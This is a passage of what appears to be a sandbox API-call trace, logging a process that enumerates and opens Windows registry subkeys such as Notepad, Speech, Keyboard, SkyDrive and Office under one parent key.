lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.652] RegCloseKey (hKey=0x178) returned 0x0 [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x36, lpName=0x18eb64, cchName=0xa | out: lpName="Wisp") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Wisp", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.652] RegCloseKey (hKey=0x178) returned 0x0 [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1c, lpName=0x18eb64, cchName=0xa | out: lpName="Notepad") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Notepad", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.652] RegCloseKey (hKey=0x178) returned 0x0 [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x28, lpName=0x18eb64, cchName=0xa | out: lpName="SQMClient") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="SQMClient", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.652] RegCloseKey (hKey=0x178) returned 0x0 [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x12, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x0, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0xe, lpName=0x18eb64, cchName=0xa | out: lpName="IAM") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IAM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.652] RegCloseKey (hKey=0x178) returned 0x0 [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x27, lpName=0x18eb64, cchName=0xa | out: lpName="Speech") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.653] RegCloseKey (hKey=0x178) returned 0x0 [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x24, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x34, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1b, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x33, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x15, lpName=0x18eb64, cchName=0xa | out: lpName="Keyboard") returned 0x0 [0083.653] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Keyboard", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.653] RegCloseKey (hKey=0x178) returned 0x0 [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x0, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x11, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x2d, lpName=0x18eb64, cchName=0xa | out: lpName="wfs") returned 0x0 [0083.653] RegCreateKeyExW (in: hKey=0x148, lpSubKey="wfs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.653] RegCloseKey (hKey=0x178) returned 0x0 [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x2f, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x34, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x30, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x3, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.653] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.653] RegEnumKeyW (in: hKey=0x148, dwIndex=0x22, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x35, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x26, lpName=0x18eb64, cchName=0xa | out: lpName="SkyDrive") returned 0x0 [0083.654] RegCreateKeyExW (in: hKey=0x148, lpSubKey="SkyDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.654] RegCloseKey (hKey=0x178) returned 0x0 [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x19, lpName=0x18eb64, cchName=0xa | out: lpName="MSDAIPP") returned 0x0 [0083.654] RegCreateKeyExW (in: hKey=0x148, lpSubKey="MSDAIPP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.654] RegCloseKey (hKey=0x178) returned 0x0 [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x34, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x33, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x15, lpName=0x18eb64, cchName=0xa | out: lpName="Keyboard") returned 0x0 [0083.654] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Keyboard", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.654] RegCloseKey (hKey=0x178) returned 0x0 [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1d, lpName=0x18eb64, cchName=0xa | out: lpName="Office") returned 0x0 [0083.654] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Office", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.654] RegCloseKey (hKey=0x178) returned 0x0 [0083.654] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.654] RegEnumKeyW (in: hKey=0x148, dwIndex=0xe, lpName=0x18eb64, cchName=0xa | out: lpName="IAM") returned 0x0 [0083.655] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IAM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, 